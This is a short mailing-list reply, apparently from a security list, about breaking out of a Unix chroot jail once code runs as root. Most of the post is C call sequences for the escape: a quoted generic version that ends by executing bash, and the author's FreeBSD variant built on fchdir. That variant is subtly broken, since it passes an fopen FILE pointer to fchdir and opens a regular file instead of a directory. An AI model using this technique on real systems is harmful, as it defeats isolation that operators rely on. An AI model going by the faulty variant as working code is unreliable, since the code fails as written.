Re: OT? Are chroots immune to buffer overflows?

["Nelson Sampaio Araujo Junior" <nelson () lunenetworks com br>]

Hi,

> But If you are able to run code as root, a few syscalls are still available to you :
> inserting modules and ptrace().

> If you're able to run code as root, all you need, in most Un*x systems,
> is:
> mkdir("blah");
> chroot("blah");
> chdir("../../../../../../");
> chroot(".");
> execl("/bin/bash", "bash", NULL);

> On others Un*x systems, like some BSDs, an implicit chdir(".") is always
> made after a chroot, so this doesn't work, but you can still do mknod(2),
> mount(2), etc..

To start working and prevent this "bug" :) in FreeBSD you can do the following:

mkdir("blah");
f = fopen("./afile", "w+");
chroot("blah");
fchdir(f);                                    <== this will prevent the "bug"
for(int i=0; i<10000; i++)
  chdir("..");
chroot(".");

Of course, you can enchance the above code to be more efficient just
by checking the chdir result.

Regards,
Nelson Junior
nelson () lunenetworks com br
nelson () LUNE com br